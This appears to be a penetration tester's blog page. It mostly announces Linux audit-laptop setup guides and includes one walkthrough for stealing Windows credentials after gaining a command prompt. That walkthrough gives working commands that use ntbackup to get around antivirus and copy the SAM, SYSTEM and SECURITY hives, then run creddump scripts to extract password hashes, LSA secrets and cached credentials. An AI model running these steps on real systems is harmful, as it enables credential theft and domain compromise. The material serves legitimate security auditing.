I’m now providing an updated Linux Penetration Testing Laptop Setup document to help install popular and useful vulnerability assessment tools for the Linux operating system. You can go and obtain Backtrack but I feel that you will have more understanding of the tools and Linux in general if you install the tools yourself. You will also have the most current version available. See Configuration Tutorials for the latest document.
Update: The latest version is now v4 on Ubuntu 11.4 Natty Narhwal.
A question was raised today during a presentation about what utilities you can use without installing them. There are engagements that the auditor is not allowed to use their own laptop and must use a laptop provided by the auditee. This severely limits how effective an engagement can be but it is not impossible to obtain the information you need when you connect to the auditee’s network. I’ve made changes to the Security Tools page to highlight which tools are stand-alone and do not require installation. Also for reference see Penetration Testing Ninjitsu which I pulled from a Core Security webcast.
I’ve created an updated configuration tutorial for setting up your Linux laptop to conduct system and network audits. This version details how to get everything up and running on the latest Ubuntu currently at version 10.04 LTS (Lucid Lynx). See the Configuration Tutorials to download the latest pdf document (currently at version 3).
An auditor’s interest in the Windows NTBACKUP Utility extends beyond examining their DR/BCP plan.
Suppose you just got command prompt access to a server (example tutorial 1, 2, & 3) but the host has anti-virus installed and you can’t disable it. You can’t use your trusty pwdump2 to dump the local password hashes (the same utility that SQLAT and SQLNINJA use). No problem, just use the ntbackup utility to make a current backup of the registry (including SAM and SYSTEM keys).
C:\>ntbackup backup systemstate /j "Auditor Owns Your Hashes" /f "%systemroot%\temp\%Username%SysState.bkf" /a
You don’t need the backup file you created so it can be deleted (C:\>del %systemroot%\temp\%Username%SysState.bkf). When a backup is done of the systemstate the files in the %systemroot%\repair folder are updated. Copy the sam, system, and security files from %systemroot%\repair.
Python needs to be installed for creddump to work.
Python version 2.5.4 from http://www.python.org/download/releases/2.5.4/
Pycrypto version 2.0.1 from http://jintoreedwine.com/files_and_stuff/pycrypto-2-0-1.zip
C:\creddump-0.1>pwdump.py SYSTEM SAM >> PWHashes.txt
C:\creddump-0.1>lsadump.py SYSTEM SECURITY >> LSASecrets.txt
C:\creddump-0.1>cachedump.py SYSTEM SECURITY >> PWCache.txt
See this tuturial on how to dictionary attack the passwords obtained from the PWCache.txt file.
You can review the LSASecrets.txt file to obtain plain text passwords for Windows service accounts. Often these accounts are also Domain accounts with the same password or even Domain Administrator accounts.
I have created an updated configuration document for my Motion Computing m1300 wireless tablet. This document details getting Ubuntu 8.04 LTS Hardy Heron up and running on the tablet. Included in the documentation are the steps to get Kismet, Aircrack-ng, and Karmasploit up and running. Those steps will be helpful no matter what hardware you install Ubuntu on.
I have also created an updated configuration document for the setup of my Linux laptop that I use for penetration testing.